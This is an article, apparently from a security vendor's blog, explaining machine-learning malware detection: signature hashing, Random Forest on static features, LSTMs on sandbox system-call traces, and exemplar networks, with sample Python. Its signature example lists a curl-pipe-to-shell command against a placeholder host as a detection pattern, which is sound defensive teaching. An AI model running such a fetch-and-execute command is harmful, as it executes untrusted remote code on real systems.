ML for checking the code and behavior of open-source solutions

Boris Zahir

Development Engineer, Development Department of the Security Vision Production Department

Ekaterina Gainullina

Information Security Engineer, Development Department of the Security Vision Production Department

Introduction

In the previous article, we looked at the ways of checking open-source software, both vendor-provided and independent. Frequently checking updates for suspicious or outright malicious activity is painstaking, responsible work, and doing it manually takes a lot of time.

There are various ways to automate this process. But because the methods of disguising malware as legitimate software evolve day by day, the process of identifying it has to develop at least as quickly.

Artificial intelligence

In the early days of the antivirus industry, detection of malware on computers was based on heuristic features that identified specific malicious files by:

• code fragments

• hashes of code fragments or the entire file

• file properties

• and combinations of these features.

The main goal was to create a reliable fingerprint – a combination of characteristics – of a malicious file that could be quickly verified.
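
A fingerprint check of this kind can be sketched in a few lines. This is only an illustration: the hash set, the byte pattern, and the function names are made up for the example and do not come from any real signature database.

```python
import hashlib

# Hypothetical signature database: SHA-256 digests of known-bad files
# and byte patterns seen in known-bad code. Values are illustrative only.
KNOWN_BAD_HASHES = {hashlib.sha256(b"evil payload v1").hexdigest()}
KNOWN_BAD_PATTERNS = [b"curl http://example.invalid/x | sh"]


def fingerprint(data: bytes) -> str:
    """Return the SHA-256 digest of the whole file content."""
    return hashlib.sha256(data).hexdigest()


def matches_signature(data: bytes) -> bool:
    """True if the whole-file hash or any known byte pattern matches."""
    if fingerprint(data) in KNOWN_BAD_HASHES:
        return True
    return any(pattern in data for pattern in KNOWN_BAD_PATTERNS)
```

Note that changing a single byte of the file changes its hash, so an exact fingerprint stops matching as soon as the sample is modified. This is the weakness that learned models try to compensate for.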

Machine learning algorithms stand out for their ability to adapt to an ever-changing environment. They do not just match known patterns: a model can be retrained on new samples and so keep up with new attacker techniques.

File information is collected at two different stages:

• Before execution, that is, before the file's code is run in any way. At this stage, information about the file format, its source code or code description, its binary representation, and other similar data may be recorded.

• After execution. At this stage, the collected data consists of logs of the system events and calls that occur while the file runs inside an isolated environment (a sandbox).

Machine learning can be applied to both types of data. Let's look at the classic approaches to each.

Classification based on static file properties

For detecting malware in open-source software, one powerful machine learning tool is the Random Forest algorithm. This technique is especially effective when working with static file properties such as code snippets, hashes, metadata, and executable file structure.
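
As a rough illustration of what static properties can look like as model input, the sketch below turns raw file bytes into a small numeric vector. The function names, the chosen features, and the list of suspicious tokens are assumptions made for this example; a real pipeline would use a much richer feature set.

```python
import math
from collections import Counter


def byte_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, at most 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def static_features(data: bytes, suspicious_tokens=(b"eval(", b"exec(", b"base64")) -> list:
    """Map raw file bytes to a fixed-length numeric feature vector.

    The token list is a hypothetical example, not a vetted indicator set.
    """
    printable = sum(1 for b in data if 32 <= b < 127)
    return [
        float(len(data)),                                  # file size in bytes
        byte_entropy(data),                                # high values hint at packing/encryption
        printable / len(data) if data else 0.0,            # share of printable ASCII
        float(sum(data.count(tok) for tok in suspicious_tokens)),
    ]
```

Every file, whatever its size, is reduced to a vector of the same length, which is what a classifier such as a decision tree expects.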

Random Forest works by generating many decision trees, each built on a different random subset of the training samples and of their attributes. Each decision tree analyzes a specific set of file characteristics, such as lines of code, import/export symbols, binary patterns, and other static attributes. The trees work independently of each other, each providing its own prediction about whether a file is malicious or not, and the forest combines these predictions, typically by majority vote.
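
The mechanism can be sketched in plain Python. This is a deliberately small teaching version, not a production implementation (in practice a library such as scikit-learn's RandomForestClassifier would be used). The two features (entropy, suspicious token count), the sample values, and the labels are invented for the example.

```python
import random
from collections import Counter


def gini(labels):
    """Gini impurity of a list of class labels."""
    n = len(labels)
    return 1.0 - sum((c / n) ** 2 for c in Counter(labels).values())


def build_tree(rows, labels, rng, depth=0, max_depth=4):
    """Grow one tree; every split looks only at a random subset of features."""
    if depth == max_depth or len(set(labels)) == 1:
        return Counter(labels).most_common(1)[0][0]  # leaf: majority label (an int)
    n_features = len(rows[0])
    candidates = rng.sample(range(n_features), max(1, int(n_features ** 0.5)))
    best = None
    for f in candidates:
        for threshold in sorted({r[f] for r in rows}):
            left = [i for i, r in enumerate(rows) if r[f] <= threshold]
            right = [i for i, r in enumerate(rows) if r[f] > threshold]
            if not left or not right:
                continue
            score = (len(left) * gini([labels[i] for i in left])
                     + len(right) * gini([labels[i] for i in right])) / len(rows)
            if best is None or score < best[0]:
                best = (score, f, threshold, left, right)
    if best is None:  # no usable split on the sampled features
        return Counter(labels).most_common(1)[0][0]
    _, f, threshold, left, right = best
    return (f, threshold,
            build_tree([rows[i] for i in left], [labels[i] for i in left], rng, depth + 1, max_depth),
            build_tree([rows[i] for i in right], [labels[i] for i in right], rng, depth + 1, max_depth))


def predict_tree(node, row):
    """Walk from the root to a leaf and return the leaf's label."""
    while isinstance(node, tuple):
        f, threshold, left, right = node
        node = left if row[f] <= threshold else right
    return node


def train_forest(rows, labels, n_trees=25, seed=0):
    """Train each tree on its own bootstrap sample of the data."""
    rng = random.Random(seed)
    forest = []
    for _ in range(n_trees):
        idx = [rng.randrange(len(rows)) for _ in rows]  # sample with replacement
        forest.append(build_tree([rows[i] for i in idx], [labels[i] for i in idx], rng))
    return forest


def predict_forest(forest, row):
    """Majority vote over the independent tree predictions."""
    return Counter(predict_tree(tree, row) for tree in forest).most_common(1)[0][0]


# Toy data: [byte entropy, suspicious token count]; 0 = benign, 1 = malicious.
X = [[4.1, 0], [4.5, 0], [3.9, 1], [4.8, 0], [4.3, 1],
     [7.2, 5], [7.8, 3], [6.9, 4], [7.5, 6], [7.1, 3]]
y = [0, 0, 0, 0, 0, 1, 1, 1, 1, 1]
forest = train_forest(X, y)
```

Calling predict_forest(forest, [7.9, 7]) asks every tree for its verdict on an unseen file and returns the label most trees agree on.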

The advantage of this approach is that the forest can be retrained on fresh samples, which lets it adapt to new types of malware.

Behavioral file analysis using recurrent networks

Recurrent neural networks (RNNs) and their variants, such as Long Short-Term Memory (LSTM) networks, are well suited to analyzing the behavior of files, especially when it comes to the sequence of system calls made by a file during its execution.

RNNs are capable of processing temporal sequence data by storing information about previous states in their memory. This allows them to analyze the behavior of the file not only at the current moment of the sandbox simulation, but also to take into account its previous activity in a cumulative manner. This approach is important for identifying complex patterns of behavior that are often characteristic of malware.
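
To make the idea of a cumulative state concrete, here is a minimal sketch of a plain recurrent step applied to a trace of system calls. The call vocabulary and the weight values are arbitrary numbers chosen for the example; in a real model the weights are learned from labeled sandbox logs.

```python
import math

# Hypothetical vocabulary of system calls observed in sandbox logs.
SYSCALL_IDS = {"open": 0, "read": 1, "write": 2, "connect": 3, "execve": 4}

# Illustrative, untrained weights: 2 hidden units, 5 possible inputs.
W_X = [[0.5, -0.3, 0.8, 0.1, -0.6],
       [-0.2, 0.7, 0.4, -0.9, 0.3]]
W_H = [[0.6, -0.4],
       [0.3, 0.5]]
B = [0.0, 0.0]


def one_hot(index, size):
    """Encode a call id as a vector with a single 1.0."""
    return [1.0 if i == index else 0.0 for i in range(size)]


def rnn_step(x, h_prev):
    """One recurrent step: h_t = tanh(W_x x_t + W_h h_{t-1} + b)."""
    return [
        math.tanh(
            sum(w * xi for w, xi in zip(W_X[j], x))
            + sum(w * hi for w, hi in zip(W_H[j], h_prev))
            + B[j]
        )
        for j in range(len(B))
    ]


def encode_trace(trace):
    """Fold a whole call sequence into one hidden state vector."""
    h = [0.0] * len(B)
    for call in trace:
        h = rnn_step(one_hot(SYSCALL_IDS[call], len(SYSCALL_IDS)), h)
    return h


state_a = encode_trace(["open", "read", "connect"])
state_b = encode_trace(["connect", "read", "open"])
```

The two traces contain the same calls in a different order, yet state_a and state_b differ. The hidden state depends on the order of events, which is exactly what a bag of static features cannot capture.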

LSTM, a type of RNN, is particularly effective at processing long sequences of data. It is able to “remember” important information over both long and short periods of time, and ignore irrelevant data. This makes LSTMs particularly suitable for analyzing complex and long-lasting behavioral patterns, such as series of branched system calls, changes to the system registry, operations on user policies or on files that may indicate malicious activity.

LSTM networks are built around structures called gates, which let the model control how information flows through its memory (the cell state). There are three main types of gates: a forget gate, an input gate, and an output gate. The forget gate decides what information from the previous cell state should be “forgotten” or discarded, the input gate determines what new data should be added to the cell state, and the output gate controls what information from the current cell state should be used in the network output.
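
The interplay of the three gates can be written out as a single step of the standard LSTM cell. The sketch below uses plain Python lists; the helper demo_params and its bias values are hypothetical and exist only to push the gates fully open or fully closed for demonstration.

```python
import math


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def affine(W, U, b, x, h):
    """Compute W x + U h + b for one gate, row by row."""
    return [
        sum(w * xi for w, xi in zip(W[j], x))
        + sum(u * hi for u, hi in zip(U[j], h))
        + b[j]
        for j in range(len(b))
    ]


def lstm_step(x, h_prev, c_prev, params):
    """One LSTM step; returns the new hidden state and cell state."""
    f = [sigmoid(z) for z in affine(*params["forget"], x, h_prev)]       # what to keep
    i = [sigmoid(z) for z in affine(*params["input"], x, h_prev)]        # what to add
    g = [math.tanh(z) for z in affine(*params["candidate"], x, h_prev)]  # new content
    o = [sigmoid(z) for z in affine(*params["output"], x, h_prev)]       # what to expose
    c = [fj * cj + ij * gj for fj, cj, ij, gj in zip(f, c_prev, i, g)]
    h = [oj * math.tanh(cj) for oj, cj in zip(o, c)]
    return h, c


def demo_params(forget_bias, input_bias):
    """Hypothetical 1-unit parameters whose gates are driven only by biases."""
    zero = [[0.0]]
    return {
        "forget": (zero, zero, [forget_bias]),
        "input": (zero, zero, [input_bias]),
        "candidate": ([[1.0]], zero, [0.0]),
        "output": (zero, zero, [20.0]),
    }


# Forget gate open, input gate closed: the old memory survives the new input.
h_keep, c_keep = lstm_step([5.0], [0.0], [0.7], demo_params(20.0, -20.0))
# Forget gate closed, input gate open: the memory is overwritten.
h_new, c_new = lstm_step([5.0], [0.0], [0.7], demo_params(-20.0, 20.0))
```

In the first call the cell state stays at about 0.7 despite the new input. In the second it is replaced by the candidate value. A trained network learns when to do which, and that is how it carries an early suspicious event across a long run of routine calls.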

By applying LSTM to the analysis of virus system call sequences, the model is able to effectively learn complex and variable patterns of behavior that may not be obvious from static analysis. For example, a virus may perform a series of routine file operations to disguise its malicious activity, such as copying or modifying system files. LSTM is able to recognize such behavioral anomalies by analyzing the sequence and context of these operations.

In addition, LSTM copes well with other dynamic characteristics of programs, such as changes to the system registry or the creation and deletion of processes, which are often indicators of malicious activity. This is especially important for detecting advanced malware that can mask its actions or change its behavior over time.

Deep learning against uncommon attacks

Typically, machine learning deals with tasks where both malicious and benign samples are present in large numbers in the training set. But some attacks are so rare that we have only one example of the malware to train on. This is typical for high-profile targeted attacks. In this case, a very specific model architecture is used, based on deep learning. This approach is called an exemplar network (ExNet).

The idea here is that the model is trained to create compact representations of the input features. These are then used to simultaneously train multiple per-exemplar classifiers, that is, algorithms that each detect a specific type of malware. Deep learning allows you to combine these multiple steps (extracting object features, building a compact feature representation, and creating a local, per-exemplar model) into a single neural network pipeline that extracts distinctive features for different types of malware.

This model can effectively generalize knowledge about individual malware samples and a large collection of clean samples. It can then detect new modifications of the corresponding malware.
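
The per-exemplar part of this idea can be illustrated with a strongly simplified sketch. It is not the ExNet architecture itself: the learned compact representation and the joint training are left out, and each detector is an ordinary logistic regression trained on one malicious exemplar against all clean samples. The two-dimensional feature vectors and the family names are invented for the example.

```python
import math


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def score(w, b, x):
    """Probability that x belongs to the exemplar's family."""
    return sigmoid(sum(wi * xi for wi, xi in zip(w, x)) + b)


def train_exemplar_detector(exemplar, clean, epochs=2000, lr=0.1):
    """Fit logistic regression on ONE malicious exemplar vs. all clean samples."""
    w = [0.0] * len(exemplar)
    b = 0.0
    # The single positive is weighted so that it balances the clean set.
    data = [(exemplar, 1.0, float(len(clean)))] + [(x, 0.0, 1.0) for x in clean]
    for _ in range(epochs):
        grad_w = [0.0] * len(w)
        grad_b = 0.0
        for x, y, weight in data:
            err = weight * (score(w, b, x) - y)
            grad_w = [g + err * xi for g, xi in zip(grad_w, x)]
            grad_b += err
        w = [wi - lr * g for wi, g in zip(w, grad_w)]
        b -= lr * grad_b
    return w, b


def matching_exemplars(sample, detectors, threshold=0.5):
    """Names of all exemplar detectors that fire on the sample."""
    return [name for name, (w, b) in detectors.items() if score(w, b, sample) > threshold]


# Hypothetical compact feature vectors (in ExNet these would be learned).
CLEAN = [[0.1, 0.2], [0.2, 0.1], [0.0, 0.3], [0.3, 0.0], [0.2, 0.2]]
EXEMPLARS = {"family_a": [1.0, 0.1], "family_b": [0.1, 1.0]}
DETECTORS = {name: train_exemplar_detector(vec, CLEAN) for name, vec in EXEMPLARS.items()}
```

A sample such as [0.9, 0.15], which lies close to the single known family_a exemplar, is picked up by that family's detector only, while a vector that looks like the clean set triggers none of them.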

  Figure 1. Example of the exemplar network (ExNet) algorithm [https://media.kaspersky.com/en/enterprise-security/Kaspersky-Lab-Whitepaper-Machine-Learning.pdf]


Conclusion

In the ongoing fight against malware, one of the key strategies has been to create reliable fingerprints for quickly verifying files. This is where machine learning algorithms come into play, capable of not only matching known patterns but also adapting to attackers' new tactics.

By using various methods for checking suspicious code, you can significantly improve and speed up the software update process, which, in turn, also speeds up the related process – patch management.

Machine learning can be applied at both stages of information collection, before and after file execution. At the first stage, the Random Forest algorithm works well with static file properties such as code fragments, hashes, and the structure of the executable file. Because it uses multiple decision trees, each analyzing its own set of characteristics, this method can adapt to new threats.

The second stage, after execution, is where recurrent neural networks (RNNs) and their derivatives such as LSTMs are used. These networks analyze sequences of system calls, remembering previous states and providing a comprehensive view of a file's behavior. This method is well suited to identifying complex malware patterns and shows why analyzing the dynamics of behavior matters.

Not everyone will go as far as automating the search for suspicious patterns just to use free software, but it is good that the option exists. Whether to use it is for each team to decide.
